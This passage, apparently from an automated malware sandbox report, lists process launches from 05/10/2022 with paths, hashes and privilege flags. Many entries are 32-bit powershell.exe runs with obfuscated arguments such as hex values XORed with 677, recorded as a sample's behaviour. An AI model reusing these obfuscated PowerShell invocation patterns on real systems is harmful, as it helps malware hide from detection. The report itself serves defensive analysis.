                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:63
                                              Start time:09:27:23
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:64
                                              Start time:09:27:24
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30303295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:65
                                              Start time:09:27:25
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:66
                                              Start time:09:27:26
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:67
                                              Start time:09:27:26
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:68
                                              Start time:09:27:28
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30783195 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:69
                                              Start time:09:27:28
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:70
                                              Start time:09:27:31
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30302E85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:71
                                              Start time:09:27:32
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:72
                                              Start time:09:27:34
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x692032DD -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:73
                                              Start time:09:27:34
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:74
                                              Start time:09:27:35
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x34302BD5 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:75
                                              Start time:09:27:36
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:76
                                              Start time:09:27:37
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2E7233FC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:77
                                              Start time:09:27:37
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:78
                                              Start time:09:27:39
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6B6570CB -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:79
                                              Start time:09:27:40
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:80
                                              Start time:09:27:41
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656C3197 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:81
                                              Start time:09:27:41
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:82
                                              Start time:09:27:42
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x3A3A51C0 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:83
                                              Start time:09:27:42
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:84
                                              Start time:09:27:44
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x74466BC9 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:85
                                              Start time:09:27:44
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:86
                                              Start time:09:27:45
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x65506DCC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:87
                                              Start time:09:27:45
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:88
                                              Start time:09:27:47
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6E7467D7 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:89
                                              Start time:09:27:47
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:90
                                              Start time:09:27:50
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x28697096 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:91
                                              Start time:09:27:51
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:92
                                              Start time:09:27:53
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:93
                                              Start time:09:27:53
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:94
                                              Start time:09:27:55
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x31343091 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:95
                                              Start time:09:27:55
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:96
                                              Start time:09:27:57
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x202C22CC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:97
                                              Start time:09:27:57
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:98
                                              Start time:09:27:59
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20302ECC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:99
                                              Start time:09:27:59
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:100
                                              Start time:09:28:01
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x20302BCC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:101
                                              Start time:09:28:01
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:102
                                              Start time:09:28:03
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2E7230FC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:103
                                              Start time:09:28:03
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:104
                                              Start time:09:28:05
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6B6570CB -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:105
                                              Start time:09:28:05
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:108
                                              Start time:09:28:08
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x656C3197 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:109
                                              Start time:09:28:08
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:110
                                              Start time:09:28:09
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x3A3A50C0 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:111
                                              Start time:09:28:09
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:112
                                              Start time:09:28:11
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x616444CC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:113
                                              Start time:09:28:11
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:114
                                              Start time:09:28:12
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x6C652ACC -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:115
                                              Start time:09:28:13
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:116
                                              Start time:09:28:14
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x72332E85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:117
                                              Start time:09:28:14
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:118
                                              Start time:09:28:16
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x69207094 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:119
                                              Start time:09:28:16
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:120
                                              Start time:09:28:18
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C206B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:121
                                              Start time:09:28:18
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:122
                                              Start time:09:28:19
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30783395 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:123
                                              Start time:09:28:19
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:124
                                              Start time:09:28:21
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x30303295 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:125
                                              Start time:09:28:21
                                              Start date:05/10/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6edaf0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:126
                                              Start time:09:28:23
                                              Start date:05/10/2022
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):
                                              Commandline:powershell.exe 0x2C2A6B85 -bxor 677
                                              Imagebase:
                                              File size:430592 bytes
                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:23.8%
                                                Dynamic/Decrypted Code Coverage:6.2%
                                                Signature Coverage:23.7%
                                                Total number of Nodes:1640
                                                Total number of Limit Nodes:52
